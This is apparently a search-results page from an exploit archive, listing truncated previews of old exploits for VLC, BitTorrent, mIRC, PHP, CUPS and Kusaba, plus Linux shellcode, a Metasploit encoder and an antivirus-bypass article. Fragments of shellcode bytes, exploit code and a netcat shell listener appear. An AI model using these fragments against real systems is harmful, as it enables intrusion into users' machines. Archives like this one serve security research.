7259 matches found
VideoLAN VLC Media Player 0.9.4 - '.ty' Local Buffer Overflow (SEH)
!/usr/bin/perl 10/23/2008 ksOSe Rewritten VLC 0.9.4 .TY File Buffer Overflow Exploit 1 - Works on Windows XP SP1, SP2, SP3 and probably win2k 2 - Works both with a local file and with a remote url 3 - VLC do not crash! 4 - Enjoy a respawing shell, even if VLC will be closed! bUGGEd htdocs nc -l -...
bittorrent-overflow.txt
!/usr/bin/perl BitTorrent 6.0.3 .torrent File Stack Buffer Overflow Exploit 09/21/2008 by ksOSe && oVeret use warnings; use strict; If you change thisavoid \x80-\x9f unless you really know what you are doing you must also change the length value of the decoder my $shellcode = windows/exec...
vlc-overflow.txt
!/usr/bin/perl 10/21/2008 ksOSe use warnings; use strict; windows/exec - 141 bytes http://www.metasploit.com my $shellcode = "\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01" . "\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01"...
BitTorrent 6.0.3 .torrent File Stack Buffer Overflow Exploit
No description provided by source. !/usr/bin/perl BitTorrent 6.0.3 .torrent File Stack Buffer Overflow Exploit 09/21/2008 by ksOSe && oVeret use warnings; use strict; If you change thisavoid \x80-\x9f unless you really know what you are doing you must also change the length value of the decoder m...
PHP 4 unserialize() ZVAL Reference Counter Overflow (Cookie)
This module exploits an integer overflow vulnerability in the unserialize function of the PHP web server extension. This vulnerability was patched by Stefan in version 4.5.0 and applies all previous versions supporting this function. This particular module targets numerous web applications and is...
A stack overflow attack and the anti-vulnerability warning-the black bar safety net
Overflow is the security of the network is often a contact to a problem, once there is some kind of overflow vulnerability, the network of thousands of computers will become a Hacker brothers and sisters on the chopping block of meat. Then the overflow in the end is what? This attack method...
GuildFTPd 0.999.8.110.999.14 - Heap Corruption (PoC) Denial of Service
GuildFTPd 0.999.8.110.999.14 - Heap Corruption PoC Denial of Service GuildFTPd v0.999.8.11/v0.999.14 heap corruption PoC/DoS exploit GuildFTPd URL - http://www.guildftpd.com cwd/list heap corruption overwrite registers in free: ecx, edi xdmnt 2008 feel free to do shellcode -- coding: windows-1252...
Kusaba 1.0.4 - Remote Code Execution (1)
After execution: http://www.kusaba.image.board/url/kasubaoek/oekaki.php?pc=print "Hello"; http://www.kusaba.image.board/url/kasubaoek/oekaki.php?sc=echo Hello / $shellname = 'oekaki.php'; // any filename ending in php $server = 'http://www.kusaba.image.board/url/'; // BBS website, with trailing...
CUPS 1.3.7 - 'HP-GL/2' Filter Remote Code Execution
source: https://www.securityfocus.com/bid/31688/info CUPS is prone to a remote code-execution vulnerability caused by an error in the 'HP-GL/2 filter. Attackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will likely cau...
linux/x86 setresuid(0,0,0) /bin/sh shellcode 35 bytes
No description provided by source. ========================================================== linux x86 setresuid0,0,0-/bin/sh shellcode 35 bytes ========================================================== Shellcode by the FHM crew: ---------------------------- http://fhm.noblogs.org...
mIRC 6.34 Remote Buffer Overflow Exploit
No description provided by source. !/usr/bin/perl mIRC 6.34 Remote Buffer Overflow Exploit Exploit by SkD skdrat at hotmail . com ---------------------------------------- A day's work of debugging and looking at mIRC. Tested on Windows XP SP3 English and Windows Vista SP0. Credits to securfrog fo...
RealPlayer/Helix Player Remote Format String Exploit (linux)
No description provided by source. / $ An open security advisory 13 - RealPlayer and Helix Player Remote Format String Exploit 1: Bug Researcher: c0ntex - c0ntexbatgmail.com 2: Bug Released: September 26th 2005 3: Bug Impact Rate: Hi 4: Bug Scope Rate: Remote $ This advisory and/or proof of conce...
MSN Messenger PNG Image Buffer Overflow Download Shellcoded Exploit
No description provided by source. / MSN Messenger PNG Image Buffer Overflow Download Shellcoded Exploit Bug discoveried by Core Security Technologies www.coresecurity.com Exploit coded By ATmaCA Copyright ?2002-2005 AtmacaSoft Inc. All Rights Reserved. Web: http://www.atmacasoft.com E-Mail:...
linux/x86 setresuid0,0,0 /bin/sh shellcode 35 bytes
linux/x86 setresuid0,0,0 /bin/sh shellcode 35 bytes. Shellcode exploit for linx86 platform ========================================================== linux x86 setresuid0,0,0-/bin/sh shellcode 35 bytes ========================================================== Shellcode by the FHM crew:...
linux/x86 setresuid(0 0 0) /bin/sh shellcode 35 bytes
No description provided by source. ========================================================== linux x86 setresuid0,0,0-/bin/sh shellcode 35 bytes ========================================================== Shellcode by the FHM crew: ---------------------------- http://fhm.noblogs.org...
linux/x86 setresuid(0,0,0) /bin/sh shellcode 35 bytes
Exploit for linux/x86 platform in category shellcode ===================================================== linux/x86 setresuid0,0,0 /bin/sh shellcode 35 bytes ===================================================== ========================================================== linux x86...
linux/x86 iopl(3); asm(cli); while(1){} 12 bytes
Exploit for linux/x86 platform in category shellcode ================================================ linux/x86 iopl3; asmcli; while1 12 bytes ================================================ / :::::::-. ... ::::::. :::. ;;, ';, ;; ;;;;;;;, ;;; ' . ' $$, $$$$ $$$ $$$ "Y$c$$ 888,o8P'88 .d888 888 Y...
XOR Encoder
Mips Web server exploit friendly xor encoder This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'metasm' class MetasploitModule 'XOR Encoder', 'Description' = %q Mips Web server exploit friendly xor encoder ,...
Bypass Kaspersky Proactive Defense system of the method of discussion-vulnerability warning-the black bar safety net
==Ph4nt0m Security Team== Issue 0x02, Phile 0x08 of 0x0A |=---------------------------------------------------------------------------=| |=-----------------= Bypass Kaspersky Proactive Defense system method discussions=----------------=|...
Microsoft Windows Media Encoder (XP SP2) - wmex.dll ActiveX Buffer Overflow (MS08-053)
Microsoft Windows Media Encoder XP SP2 - wmex.dll ActiveX Buffer Overflow MS08-053 ============================================================================= MS08-053 Windows Media Encoder wmex.dll ActiveX Control Buffer Overflow...